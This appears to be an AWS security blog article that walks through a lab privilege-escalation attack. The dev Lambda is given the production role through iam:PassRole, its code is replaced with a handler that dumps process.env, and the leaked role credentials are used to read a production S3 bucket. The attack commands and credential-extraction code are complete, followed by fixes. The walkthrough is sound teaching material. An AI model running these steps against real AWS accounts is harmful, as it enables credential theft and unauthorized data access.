AWS security case study: Vulnerable roles

How to transfer permissions between Lambda functions

In this case study, we'll look into a security problem that can wreak havoc on the resources in an AWS account. It relies on an obscure feature that most newcomers to the AWS ecosystem do not know about.



There is a production Lambda function with a production S3 bucket, and an identical development environment with its own dev function and dev bucket. The production Lambda can read the production bucket, and the development function can read the development one.

There is also a malicious user with full access to the development resources and read-only access to the production Lambda. In a real-world scenario, this user could be an employee who leaked their keys.

The target is the production S3 bucket.

This setup can be secured, but there is a bug somewhere in this scenario that gives the attacker access to the target bucket.

Set up the environment

If you want to follow along with this article, you can deploy this scenario with Terraform. It sets up everything for you and outputs all the resources and data you'll need. The CLI examples are written for Linux, but I'm reasonably sure that they work on macOS, and probably on Windows too.

To deploy the architecture, download the code from the GitHub repository, initialize it with terraform init, and deploy it with terraform apply.

The module outputs the important bits:

- The ARNs of the Lambda functions

- The name of the production bucket and the key of an object in it

- The credentials for the IAM user

```
$ terraform output
access_key_id = "AKIAUB3O2IQ5LAZUSUPR"
dev_lambda_arn = "arn:aws:lambda:eu-central-1:278868411450:function:function-dev-81c81e69f06ce7ba"
production_bucket = "terraform-20210730062858871600000002"
production_lambda_arn = "arn:aws:lambda:eu-central-1:278868411450:function:function-81c81e69f06ce7ba"
secret = "secret.txt"
secret_access_key = <sensitive>
```

(Don't forget to clean up with terraform destroy when you are done.)

To emulate an environment where you are logged in as the user, start a new shell with the credentials set:

```bash
AWS_ACCESS_KEY_ID=$(terraform output -raw access_key_id) \
AWS_SECRET_ACCESS_KEY=$(terraform output -raw secret_access_key) \
AWS_SESSION_TOKEN="" bash
```

All subsequent AWS CLI commands run as that user:

```
$ aws sts get-caller-identity
{
    "UserId": "AKIAUB3O2IQ5LAZUSUPR",
    "Account": "278868411450",
    "Arn": "arn:aws:iam::278868411450:user/user-81c81e69f06ce7ba"
}
```

First, check that the production Lambda can read the production bucket:

```bash
aws lambda invoke --function-name $(terraform output -raw production_lambda_arn) >(jq '.') > /dev/null
```

```
{
  "IsTruncated": false,
  "Contents": [
    {
      "Key": "secret.txt",
      "LastModified": "2021-07-30T06:29:01.000Z",
      "ETag": "\"8ea9db4a73bbd26c50e5387f8e7e86aa\"",
      "Size": 17,
      "StorageClass": "STANDARD"
    }
  ],
  "Name": "terraform-20210730062858871600000002",
  "Prefix": "",
  "MaxKeys": 1000,
  "CommonPrefixes": [],
  "KeyCount": 1
}
```

The Lambda code returns the list of objects in the bucket. Notice the secret.txt in the bucket. This is the object we're interested in.

Then check that the user cannot read the production bucket:

```bash
aws s3api get-object \
  --bucket $(terraform output -raw production_bucket) \
  --key $(terraform output -raw secret) \
  >(cat)
```

```
An error occurred (AccessDenied) when calling the GetObject operation: Access Denied
```

After this, let's check that the development function reads a different bucket:

```bash
aws lambda invoke --function-name $(terraform output -raw dev_lambda_arn) >(jq '.') > /dev/null
```

```
{
  "IsTruncated": false,
  "Contents": [],
  "Name": "terraform-20210730062858872800000003",
  "Prefix": "",
  "MaxKeys": 1000,
  "CommonPrefixes": [],
  "KeyCount": 0
}
```

So, how can this user get the object from the production bucket?

If you want to solve this puzzle on your own, stop reading here and come back for the solution later.

The attack

First, let's get the production Lambda config:

```bash
aws lambda get-function --function-name $(terraform output -raw production_lambda_arn) | jq '.'
```

```
{
  "Configuration": {
    "FunctionName": "function-81c81e69f06ce7ba",
    "FunctionArn": "arn:aws:lambda:eu-central-1:278868411450:function:function-81c81e69f06ce7ba",
    "Runtime": "nodejs14.x",
    "Role": "arn:aws:iam::278868411450:role/terraform-20210730062858868000000001",
    "Handler": "main.handler",
    "...",
    "Environment": {
      "Variables": {
        "BUCKET": "terraform-20210730062858871600000002"
      }
    }
  },
  "Code": {
    "RepositoryType": "S3",
    "Location": "https://awslambda-eu-cent-1-tasks.s3.eu-central-1.amazonaws.com/snapshots/..."
  }
}
```

We'll need the Role later, so let's save it in a variable:

```bash
PROD_ROLE=$(aws lambda get-function \
  --function-name $(terraform output -raw production_lambda_arn) | jq -r '.Configuration.Role')
```



Next, change the development Lambda to use the production role:

```bash
aws lambda update-function-configuration \
  --function-name $(terraform output -raw dev_lambda_arn) \
  --role $PROD_ROLE
```

With this change, the development Lambda no longer has permission to read the development bucket, so invoking it returns an error:

```bash
aws lambda invoke --function-name $(terraform output -raw dev_lambda_arn) >(cat) > /dev/null
```

```
{"errorType":"AccessDenied","errorMessage":"Access Denied", ...}
```

This indicates that the dev function now runs with the production role, which has access to the target bucket, so the only thing left is to exploit that access through the function.

Create a new entry point for the function:

```bash
echo "module.exports.handler = async () => process.env;" > main.js
```

Zip it:

```bash
zip code.zip main.js
```

Then upload this code to the development Lambda:

```bash
aws lambda update-function-code \
  --function-name $(terraform output -raw dev_lambda_arn) \
  --zip-file fileb://code.zip --publish
```



With the role and the new code set up, let's invoke the function:

```bash
aws lambda invoke --function-name $(terraform output -raw dev_lambda_arn) >(jq '.') > /dev/null
```

It prints all the environment variables that are set for the function and also those that the Lambda service passes to it:

```
{
  "AWS_LAMBDA_FUNCTION_VERSION": "$LATEST",
  "BUCKET": "terraform-20210730062858872800000003",
  "AWS_SESSION_TOKEN": "IQoJb3JpZ2luX2VjE...",
  "LAMBDA_TASK_ROOT": "/var/task",
  "...",
  "AWS_SECRET_ACCESS_KEY": "CRLzkJWa...",
  "...",
  "AWS_ACCESS_KEY_ID": "ASIAUB...",
  "..."
}
```

Notice the IAM credentials here: AWS_SESSION_TOKEN, AWS_SECRET_ACCESS_KEY, and the AWS_ACCESS_KEY_ID. These carry the permissions of the production Lambda.
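These three variables are everything an AWS client needs to act as the role. As a small illustration in JavaScript (the language of the function code), the sketch below pulls them out of the object the modified function returned and turns them into the variable prefix used in the next command. It also checks the access key ID prefix: long-term IAM user keys start with AKIA (like the user's key in the Terraform output), while temporary STS credentials start with ASIA. All function names here are hypothetical helpers, not part of any AWS SDK.

```javascript
// Hypothetical helper: pick the execution role's credentials out of the
// JSON object returned by the modified development function.
function extractCredentials(envDump) {
  const accessKeyId = envDump.AWS_ACCESS_KEY_ID;
  const secretAccessKey = envDump.AWS_SECRET_ACCESS_KEY;
  const sessionToken = envDump.AWS_SESSION_TOKEN;
  if (!accessKeyId || !secretAccessKey) {
    return null; // no usable credentials in this dump
  }
  return { accessKeyId, secretAccessKey, sessionToken };
}

// Access key IDs of temporary (STS) credentials start with "ASIA";
// long-term IAM user access keys start with "AKIA".
function isTemporaryKey(accessKeyId) {
  return accessKeyId.startsWith("ASIA");
}

// Quote a value for a POSIX shell: wrap it in single quotes and escape
// any embedded single quote as '\''.
function shellQuote(value) {
  return "'" + String(value).replace(/'/g, "'\\''") + "'";
}

// Build the variable prefix placed in front of the aws CLI command.
function toEnvPrefix(creds) {
  return [
    `AWS_ACCESS_KEY_ID=${shellQuote(creds.accessKeyId)}`,
    `AWS_SECRET_ACCESS_KEY=${shellQuote(creds.secretAccessKey)}`,
    `AWS_SESSION_TOKEN=${shellQuote(creds.sessionToken)}`,
  ].join(" ");
}

// Trimmed version of the output above (values still elided).
const dump = {
  AWS_LAMBDA_FUNCTION_VERSION: "$LATEST",
  AWS_SESSION_TOKEN: "IQoJb3JpZ2luX2VjE...",
  AWS_SECRET_ACCESS_KEY: "CRLzkJWa...",
  AWS_ACCESS_KEY_ID: "ASIAUB...",
};

const creds = extractCredentials(dump);
console.log(isTemporaryKey(creds.accessKeyId)); // true
console.log(isTemporaryKey("AKIAUB3O2IQ5LAZUSUPR")); // false
console.log(toEnvPrefix(creds));
```

The ASIA prefix is a quick way to tell that the keys came from an assumed role rather than from an IAM user.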

Use these credentials to get the object from the production bucket:

```bash
AWS_ACCESS_KEY_ID=ASIAUB... \
AWS_SECRET_ACCESS_KEY=CRLzkJWa... \
AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjE... aws s3api get-object \
  --bucket $(terraform output -raw production_bucket) \
  --key $(terraform output -raw secret) >(cat) > /dev/null
```

```
production secret
```

This proves that we have access to the production bucket.

Analysis

The AWS Lambda permission model is based on roles. Roles are identities that can have permissions via IAM policies, much like IAM users, but their credentials are short-term. This means that instead of passing the credentials to the Lambda function, you only need to configure the role and allow the Lambda service to get these temporary credentials. With this, you can attach permissions to a function without hardcoding secrets in the code.

A role that is configured for a function is called the function's execution role. When the function is invoked, the Lambda service assumes the role, which means it gets an AWS_ACCESS_KEY_ID, an AWS_SECRET_ACCESS_KEY, and an AWS_SESSION_TOKEN for that role and passes them to the function when it runs. That's how the production function can read the production bucket: it uses a role that has the necessary permissions.

Three things are needed to associate a role with a function:

- Write access to the function's configuration

- The role's trust policy must allow the Lambda service to use it

- The iam:PassRole permission
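The three requirements can be expressed as a small predicate. The trust policy below is the standard document that lets the Lambda service assume a role; note that it names the service, not a function. The checker is a deliberately simplified sketch with hypothetical names: it only looks at Allow statements with a Service principal and ignores conditions and wildcards, so it is no substitute for IAM's own evaluation.

```javascript
// The usual trust policy for a Lambda execution role: it names the Lambda
// service as the principal, but not any particular function.
const lambdaTrustPolicy = {
  Version: "2012-10-17",
  Statement: [
    {
      Effect: "Allow",
      Principal: { Service: "lambda.amazonaws.com" },
      Action: "sts:AssumeRole",
    },
  ],
};

// IAM fields can hold a single string or an array of strings.
function asArray(value) {
  return Array.isArray(value) ? value : [value];
}

// Simplified: does any Allow statement let `service` call sts:AssumeRole?
// (Ignores Deny statements, conditions, and wildcards.)
function trustsService(trustPolicy, service) {
  return asArray(trustPolicy.Statement).some(
    (s) =>
      s.Effect === "Allow" &&
      asArray(s.Action).includes("sts:AssumeRole") &&
      s.Principal !== undefined &&
      asArray(s.Principal.Service || []).includes(service)
  );
}

// Hypothetical model of the three requirements listed above.
function canAttachRole({ canUpdateFunctionConfig, trustPolicy, canPassRole }) {
  return (
    canUpdateFunctionConfig &&
    trustsService(trustPolicy, "lambda.amazonaws.com") &&
    canPassRole
  );
}

// The attacker's situation in this scenario: all three hold.
console.log(
  canAttachRole({
    canUpdateFunctionConfig: true,
    trustPolicy: lambdaTrustPolicy,
    canPassRole: true,
  })
); // true
```

Since nothing in the trust policy identifies a function, the check passes for every Lambda function in the account, including the development one.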

In this scenario, all three are in place for associating the production role (and its permissions) with the development Lambda function:

- The attacker has write access to the development Lambda's configuration

- The role already trusts the Lambda service

- The AWSLambda_FullAccess managed policy allows passing any role to the Lambda service, and therefore to any Lambda function:

```json
{
    "Effect": "Allow",
    "Action": "iam:PassRole",
    "Resource": "*",
    "Condition": {
        "StringEquals": {
            "iam:PassedToService": "lambda.amazonaws.com"
        }
    }
}
```

This makes it possible for the attacker to move the production permissions to a function that they control.
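To see why this statement covers the production role, here is a heavily simplified sketch of matching a single Allow statement against a request. It supports only * and ? wildcards and the StringEquals condition operator, which is enough for this statement but far from IAM's full evaluation logic (for example, it matches actions case-sensitively). The function names and the request shape are hypothetical.

```javascript
// Convert an IAM-style pattern with "*" and "?" wildcards into a RegExp.
function wildcardToRegExp(pattern) {
  const escaped = pattern.replace(/[.+^${}()|[\]\\]/g, "\\$&");
  return new RegExp("^" + escaped.replace(/\*/g, ".*").replace(/\?/g, ".") + "$");
}

function asArray(value) {
  return Array.isArray(value) ? value : [value];
}

// Simplified: does one Allow statement grant `request`? Only StringEquals
// conditions are understood; any other operator makes the match fail.
function statementAllows(statement, request) {
  if (statement.Effect !== "Allow") return false;
  const actionOk = asArray(statement.Action).some((a) => wildcardToRegExp(a).test(request.action));
  const resourceOk = asArray(statement.Resource).some((r) => wildcardToRegExp(r).test(request.resource));
  if (!actionOk || !resourceOk) return false;
  for (const [operator, checks] of Object.entries(statement.Condition || {})) {
    if (operator !== "StringEquals") return false;
    for (const [key, expected] of Object.entries(checks)) {
      if (!asArray(expected).includes(request.context[key])) return false;
    }
  }
  return true;
}

// The PassRole statement from AWSLambda_FullAccess, as shown above.
const passRoleStatement = {
  Effect: "Allow",
  Action: "iam:PassRole",
  Resource: "*",
  Condition: { StringEquals: { "iam:PassedToService": "lambda.amazonaws.com" } },
};

// Passing the production role to Lambda, as update-function-configuration does.
const request = {
  action: "iam:PassRole",
  resource: "arn:aws:iam::278868411450:role/terraform-20210730062858868000000001",
  context: { "iam:PassedToService": "lambda.amazonaws.com" },
};

console.log(statementAllows(passRoleStatement, request)); // true
```

Because Resource is "*", the only thing the condition restricts is the target service, not which role is passed.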

With a function that has access to the target bucket, it's just a matter of code. The easiest way is to simply extract the credentials from the environment the Lambda service passes to the function. That's what this code does:

```javascript
module.exports.handler = async () => process.env;
```

This handler returns process.env, which holds all the environment variables.

What happens under the hood?

Before running this handler, the Lambda service assumes the function's execution role. It can do that because the role's trust policy allows the lambda.amazonaws.com service. It then calls the function code with an environment that includes the resulting credentials.
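To make that flow concrete, here is a toy local simulation in JavaScript, not the real Lambda runtime: a hypothetical invokeWithRole function plays the Lambda service, puts placeholder credentials for the execution role into process.env, calls the handler from the attack, and returns its result as JSON. It illustrates why the handler sees the role's credentials without ever requesting them.

```javascript
// Toy stand-in for the Lambda service; NOT the real runtime. The real service
// gets these values by assuming the execution role, and sets them up for the
// whole execution environment rather than per call.
async function invokeWithRole(handler, roleCredentials, event = {}) {
  const saved = { ...process.env };
  try {
    // Expose the role's credentials to the handler through the environment.
    process.env.AWS_ACCESS_KEY_ID = roleCredentials.accessKeyId;
    process.env.AWS_SECRET_ACCESS_KEY = roleCredentials.secretAccessKey;
    process.env.AWS_SESSION_TOKEN = roleCredentials.sessionToken;
    const result = await handler(event);
    // Lambda hands the handler's result back to the caller as JSON.
    return result === undefined ? null : JSON.parse(JSON.stringify(result));
  } finally {
    // Restore this local process's original environment.
    for (const key of Object.keys(process.env)) {
      if (!Object.prototype.hasOwnProperty.call(saved, key)) {
        delete process.env[key];
      }
    }
    Object.assign(process.env, saved);
  }
}

// The handler uploaded during the attack.
const handler = async () => process.env;

// Placeholder credentials; for a real role they would come from STS.
const demo = invokeWithRole(handler, {
  accessKeyId: "ASIA-EXAMPLE",
  secretAccessKey: "example-secret",
  sessionToken: "example-token",
}).then((result) => {
  console.log(result.AWS_ACCESS_KEY_ID); // ASIA-EXAMPLE
  return result;
});
```

The result is serialized before the environment is restored, mirroring how the real invocation response is a JSON snapshot of what the handler returned.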

In normal operations, the AWS SDK reads these credentials when it makes requests to AWS services, so this process is mostly hidden:

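```javascript
// AWS SDK for JavaScript v2 (bundled with the nodejs14.x runtime)
const AWS = require("aws-sdk");

module.exports.handler = async (event, context) => {
  // No credentials are passed here: the SDK picks up AWS_ACCESS_KEY_ID,
  // AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN from the environment.
  const s3 = new AWS.S3();
  const bucket = process.env.BUCKET;
  // List the objects in the bucket configured for this function
  const contents = await s3.listObjectsV2({Bucket: bucket}).promise();
  return contents;
};
```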

But whoever has access to the environment can extract these keys, and then can use them to impersonate the Lambda function.

How to fix it

This vulnerability is an example of transitive permissions: an attacker with some access to the account can extend that access by abusing the permissions they already have.

The best solution would be to lock down a role's trust policy so that only a specific function can use it, but unfortunately, AWS does not support this. You can only specify that a role can be used by Lambda functions and not by, let's say, EC2 instances.

One solution is to deny the iam:PassRole action on the production role to everyone who does not have write access to the production function:

```json
{
    "Action": [
        "iam:PassRole"
    ],
    "Effect": "Deny",
    "Resource": "<production role arn>"
}
```

The problem with this approach is that you need to add it to every user individually and even one omission is enough to introduce this vulnerability.
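The Deny statement works even for a user who also has AWSLambda_FullAccess because, in IAM policy evaluation, an explicit Deny overrides any Allow, and anything not allowed is implicitly denied. Below is a minimal sketch of that precedence rule under stated assumptions: it supports only exact matches and a bare "*", it ignores conditions (so the PassedToService condition is left out), and the function names and the dev role ARN are hypothetical.

```javascript
// Does a statement's Action/Resource cover the value? Supports only exact
// matches and a bare "*" (no partial wildcards, no conditions).
function matches(patterns, value) {
  const list = Array.isArray(patterns) ? patterns : [patterns];
  return list.some((p) => p === "*" || p === value);
}

// Simplified IAM decision for one identity: explicit Deny > Allow > implicit deny.
function decide(statements, action, resource) {
  const applicable = statements.filter(
    (s) => matches(s.Action, action) && matches(s.Resource, resource)
  );
  if (applicable.some((s) => s.Effect === "Deny")) return "ExplicitDeny";
  if (applicable.some((s) => s.Effect === "Allow")) return "Allow";
  return "ImplicitDeny";
}

const prodRoleArn = "arn:aws:iam::278868411450:role/terraform-20210730062858868000000001";
const devRoleArn = "arn:aws:iam::278868411450:role/dev-role-example"; // hypothetical

const userStatements = [
  // PassRole grant from AWSLambda_FullAccess (condition omitted in this sketch)
  { Effect: "Allow", Action: "iam:PassRole", Resource: "*" },
  // The extra Deny for the production role
  { Effect: "Deny", Action: ["iam:PassRole"], Resource: prodRoleArn },
];

console.log(decide(userStatements, "iam:PassRole", prodRoleArn)); // ExplicitDeny
console.log(decide(userStatements, "iam:PassRole", devRoleArn)); // Allow
```

The same rule is also why a single missing Deny matters: without it, the user's evaluation falls through to the Allow.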

This is just one of many examples that show how hard it is to give users access to some parts of an AWS account but not to others. A better solution is to separate the production resources from the development ones using account boundaries. AWS Organizations provides an easy way to create fully separated environments that share almost nothing by default. With separate accounts, developers have no access to production resources no matter how powerful their permissions are in the development account.

Lessons learned

- Lambda functions get access to resources via roles

- A role needs to trust the Lambda service in its trust policy, but otherwise it can be attached to any Lambda function

- The iam:PassRole permission controls whether an identity can attach a role to a function

- Attaching a role to another function allows an attacker to use its permissions in an environment that they control

- It's hard to implement access control within a single account; it's better to use multiple accounts